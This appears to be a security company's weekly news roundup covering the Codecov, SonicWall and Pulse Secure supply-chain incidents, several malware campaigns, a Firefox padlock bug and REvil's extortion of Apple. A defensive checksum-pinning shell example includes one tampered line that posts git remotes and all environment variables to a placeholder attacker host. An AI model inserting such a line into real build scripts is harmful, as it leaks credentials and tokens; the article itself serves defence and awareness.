Cybersecurity Week in Review: 04/19/21
Posted by: GuidePoint Security
The software and hardware supply chain is in the news again this week, with a breach at Codecov and actively exploited vulnerabilities in SonicWall and Pulse Secure products. We also highlight ongoing malware threats, including malware targeting Apple's new M1 Macs, ad servers compromised to serve malicious advertisements, and the use of the Telegram app to control computers infected with malware called ToxicEye. Finally, we take a look at a threat spoofing the HTTPS padlock in the Firefox browser, how Google Alerts can surface malware and scams, and a ransomware extortion attempt by the REvil gang aimed at Apple.
More Dangerous Software/Hardware Supply Chain Attacks
Codecov Bash Uploader compromised; zero-days in SonicWall Email Security products; Pulse Secure VPN vulnerabilities under active attack
What You Need to Know
Once again, businesses and security professionals have to deal with supply chain risk, as breaches and bugs at three different software and IT hardware suppliers dominate the news. Codecov, which provides code coverage tooling that runs inside customers' build pipelines, announced that an attacker had altered one of its tools and that the modification went unnoticed for roughly two months. A security hardware manufacturer released patches for three zero-day bugs affecting its hosted and on-premises email security products. And researchers announced that nation-state threat actors tied to both the Chinese and Russian governments were actively exploiting vulnerabilities in Pulse Secure VPN appliances.
Summary
Last week, in an attack being compared to SolarWinds, businesses learned that a software tooling provider and its customers had become the latest victims in the spate of supply chain attacks. Codecov, which provides code coverage and software testing services to businesses, disclosed that its Bash Uploader script was modified by an attacker beginning in late January 2021; the change went undetected until early April, when a customer noticed that the script's checksum did not match the value published on Codecov's download page. Investigators believe the attackers used the altered uploader to harvest secrets from customers' build environments and then used those secrets, with automation, to access hundreds of customer networks. Data at risk includes customer credentials such as tokens and API keys, services (data stores, application code) reachable with those credentials, and the git remote information of repositories that used the Bash Uploader. Affected customers reportedly include at least 100 private businesses and nine U.S. government agencies.
Last week SonicWall, a security hardware manufacturer, advised customers to urgently patch three zero-day vulnerabilities in its Email Security products. The company said the vulnerabilities were already being exploited in the wild and, chained together, could give a threat actor a "significant foothold" in a target's network. CVE-2021-20021 lets an unauthenticated attacker create an administrative account by sending a crafted HTTP request to the remote host; CVE-2021-20022 and CVE-2021-20023 allow a post-authentication attacker to upload and read, respectively, arbitrary files on the host. Affected products are Email Security 10.0.4 and later, for both Windows and the Hardware/ESXi virtual appliance, and Hosted Email Security 10.0.4 and later, prior to the fixed releases.
In the third major vendor-related story disclosed last week, researchers announced that threat actors tied to the Chinese government have been exploiting vulnerabilities in Pulse Connect Secure VPN appliances. One bug (CVE-2021-22893) is an authentication bypass that enables remote code execution (RCE) and is being used to gain administrator-level access to the appliances. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive requiring every executive branch agency to run Pulse Secure's integrity checking tool, apply the vendor's mitigations and report back by Friday, April 23, 2021. Last week the U.S. National Security Agency (NSA), CISA and the U.S. Federal Bureau of Investigation (FBI) also issued a joint advisory on ongoing exploitation of an older Pulse Connect Secure vulnerability (CVE-2019-11510), along with bugs in other VPNs and appliances, by Russian Foreign Intelligence Service (SVR) actors (also known as APT29, Cozy Bear and The Dukes). Threat actors have also been observed connecting to an organization's network through the Pulse Secure VPN and then moving laterally to a SolarWinds Orion server to install malware dubbed Supernova. At least 12 malware families are associated with exploitation of the Pulse Secure VPN appliances.
Next Steps
Each of the affected companies has issued recommendations and remediations for the vulnerabilities:
- Codecov says the internal issue has been fixed and that it has notified all affected customers. It is urging customers to rotate any credentials, tokens or keys that were present as environment variables in CI jobs that ran the Bash Uploader, if they have not already done so.
- Customers of SonicWall's on-premises Email Security products are urged to update to versions 10.0.9.6173 (Windows) and 10.0.9.6177 (Hardware/ESXi Virtual Appliance); SonicWall has patched Hosted Email Security on its side.
- Pulse Secure has released the Pulse Connect Secure (PCS) Integrity Assurance tool to check the integrity of the files on PCS appliances. The NSA, CISA and the FBI are all urging businesses and government agencies to check their networks for Indicators of Compromise (IoCs) and apply the published mitigations.
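The Codecov incident worked because build pipelines fetched a script from the vendor and ran it sight unseen. The defensive counterpart is to pin the digest of any fetched CI helper and refuse to run it on mismatch, which is exactly the check that surfaced the tampering. The script below is an added example, not Codecov's, SonicWall's, Pulse Secure's or GuidePoint's code. The "uploader" content, the tampered copy, the file names and the host attacker.invalid are all constructed for the demonstration; the pinned digest is computed at runtime from the trusted copy, whereas in a real pipeline it would be a literal committed to the repository when the script was last reviewed.

```shell
#!/bin/sh
# Added example (not Codecov's, the vendors', or GuidePoint's code): pin the
# SHA-256 of a fetched CI helper script and refuse to execute it on mismatch.
# The "uploader" content, the tampered copy and the attacker host below are
# constructed for illustration; in a real pipeline PINNED_SHA256 would be the
# value you recorded when you last reviewed the script, stored in the repo.

# Print the SHA-256 of a file (GNU coreutils sha256sum or BSD/macOS shasum).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# verify_and_run FILE EXPECTED_SHA256
# Executes FILE only if its digest equals EXPECTED_SHA256. On mismatch it
# prints both digests to stderr and returns 1 without running a single line.
verify_and_run() {
    _file="$1"; _expected="$2"
    _actual="$(sha256_of "$_file")"
    if [ "$_actual" != "$_expected" ]; then
        printf 'checksum mismatch for %s\n  expected: %s\n  actual:   %s\n' \
            "$_file" "$_expected" "$_actual" >&2
        return 1
    fi
    sh "$_file"
}

# ---- Constructed demonstration -------------------------------------------
tmpdir="$(mktemp -d)"
trap 'rm -rf "$tmpdir"' EXIT

# The reviewed, trusted version of the script, as it would be pinned.
GOOD_SCRIPT="$tmpdir/uploader.sh"
printf '%s\n' '#!/bin/sh' 'echo "uploading coverage report"' > "$GOOD_SCRIPT"
PINNED_SHA256="$(sha256_of "$GOOD_SCRIPT")"

# A tampered copy: the same script with one appended line that would dump the
# CI environment (tokens, API keys, git remotes) to an attacker-controlled
# host, the pattern reported for the Bash Uploader incident. The host is a
# non-routable placeholder and the line is never executed below.
BAD_SCRIPT="$tmpdir/uploader-tampered.sh"
cp "$GOOD_SCRIPT" "$BAD_SCRIPT"
printf '%s\n' 'curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://attacker.invalid/upload' >> "$BAD_SCRIPT"

# The trusted copy runs; the tampered copy is refused before anything executes.
verify_and_run "$GOOD_SCRIPT" "$PINNED_SHA256"
verify_and_run "$BAD_SCRIPT" "$PINNED_SHA256" || echo "refused tampered uploader"
```

In a pipeline the pinned value lives in the repository next to the workflow file, so a change to the script and a change to the digest have to travel together through code review. A digest published on the vendor's download page is a useful cross-check, but it is served by the same party whose infrastructure was compromised, so treat it as a hint rather than the authority, and prefer vendoring the script or a signed release over fetching it on every build.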
This Week in Malware
Apple’s new M1 Macs a target; 120 ad servers compromised; and Telegram abused to control ToxicEye
What You Need to Know
There were some interesting twists and turns on the malware front last week. Researchers discovered that threat actors have recompiled the XCSSET malware to run natively on Apple’s M1 chips. A malvertising campaign dubbed ‘Tag Barnakle’ has breached over 120 ad servers. And cybercriminals are using the messaging app Telegram to control computers infected with the ToxicEye malware.
Summary
Researchers disclosed a new Mac threat last week: a version of the XCSSET malware recompiled to run natively on Apple’s M1 chips. XCSSET, which targets Xcode developers, has previously spread by injecting itself into Xcode projects, and earlier variants exploited two zero-day vulnerabilities to launch ransomware and steal personal information. The latest version can steal cryptocurrency, appears capable of bypassing macOS Big Sur security features, and abuses the Safari browser to plant a Universal Cross-site Scripting (UXSS) injection served from its command and control (C&C) server. Infections appear to originate from applications downloaded from unofficial and disreputable sources.
In another notable malware story, at least 120 ad servers were breached over the last year and implanted with code that served malicious desktop and mobile advertisements capable of redirecting visitors to websites hosting malware and scamware. Legitimate websites that load ads from a compromised server unknowingly display the malicious ads; if a user clicks one, they are redirected to a site that pushes fake security, safety or VPN apps through an app store.
A remote access trojan (RAT) dubbed ‘ToxicEye’ abuses the Telegram messaging app for command and control. Researchers found that computers infected with ToxicEye can be controlled from a Telegram account, and that the malware can also install ransomware, take over the file system and leak data. Researchers have observed at least 130 ToxicEye attacks in the past ninety days.
Next Steps
Since the M1 XCSSET variant appears to spread through unofficial applications, researchers advise downloading apps only from legitimate and official sources. Users or enterprises that suspect a ToxicEye infection are advised to look for the file “C:\Users\ToxicEye\rat.exe”; if it is present, it should be removed immediately. A fixed file path is a weak indicator, however: its absence does not rule out infection, and removal should be followed by a wider investigation of the host and rotation of any credentials stored on it.
Threat Roundup
Firefox flaws, REvil extortion attempts and dangerous Google alerts
What You Need to Know
In other threat news, Mozilla released Firefox 88 to fix a series of bugs, including one that allowed spoofing of the “padlock” icon that indicates an HTTPS connection. The REvil ransomware gang attempted to put pressure on Apple last week after Apple supplier Quanta Computer refused to pay a ransom for stolen product schematics. And researchers reported that Google Alerts can be a haven for malware and scams, with some alerts pointing almost entirely to malicious websites.
Summary
In an update to the popular Firefox browser, Mozilla fixed 13 vulnerabilities, including one that allowed spoofing of the HTTPS padlock icon. Tracked as CVE-2021-23998, the bug affected both the standard release and the Extended Support Release (ESR) of Firefox. While rated ‘moderate’ severity, the risk from this particular vulnerability shouldn’t be underestimated. The padlock shown by Firefox, Safari, Chrome and other popular browsers indicates that the connection to the site is encrypted with Transport Layer Security (TLS) and that the server presented a certificate valid for the hostname; it says nothing about whether the site itself is honest. Cybercriminals can easily obtain TLS certificates (still commonly called SSL certificates) for malicious domains, so the padlock was never a guarantee of safety, but users do rely on browser security indicators when deciding whether to enter credentials or share data, and a page that can display a padlock for a connection that doesn’t deserve one undermines even that limited signal.
The REvil ransomware gang went ahead and posted plans and schematics for existing and upcoming Apple products after Apple supplier Quanta Computer refused to pay a $50 million ransom for the stolen data. REvil also claims to hold data on both Quanta employees and customers. After Quanta refused to pay, REvil turned to extorting Apple directly, claiming that Apple has until May 1 to pay before additional documents are leaked online. REvil operators also claim to be negotiating the sale of confidential drawings and gigabytes of personal data to other major brands.
And finally, in an informal but interesting study, researchers found that Google Alerts are rife with links to websites hosting malware and scams. Cybercriminals appear to game the alerts with a search engine optimization (SEO) technique called ‘cloaking’, in which a site shows search engine crawlers benign, keyword-rich content while serving different content, such as redirects to scam or malware pages, to human visitors. In one test, a Google Alert set up by the researchers returned almost entirely malicious websites.
Next Steps
Firefox users are advised to update to Firefox 88 or later (ESR users to 78.10 or later). To keep users off malicious websites (including those delivered through Google Alerts), businesses are advised to deploy endpoint security and web filtering that block known-malicious URLs.
Final Words
The complexity of today’s threats can be overwhelming. And while security researchers are continually contributing valuable research and knowledge about threats and mitigations, the sheer volume of information can make it impossible to stay on top of every update, risk, breach and attack. For example, last week there was confusion around a legitimate Twitter request, which many security professionals assumed to be a phishing attack.
The Department of Justice recently announced its intent to launch a task force to combat the growing ransomware threat, but the reality is that task forces and constant alerts about the latest malware and system or appliance vulnerabilities are likely arriving on the doorstep of already overburdened and understaffed security teams.
While there is no single silver bullet to prevent cyberattacks, businesses can alleviate some of the burden by working with experienced security professionals in areas like cloud security architecture, identity and access management and vulnerability management and penetration testing.
The path to better security isn’t about one person or one fix. It’s a team effort involving internal and external security professionals, employees and researchers to combat the dangerous threats delivered by today’s criminals.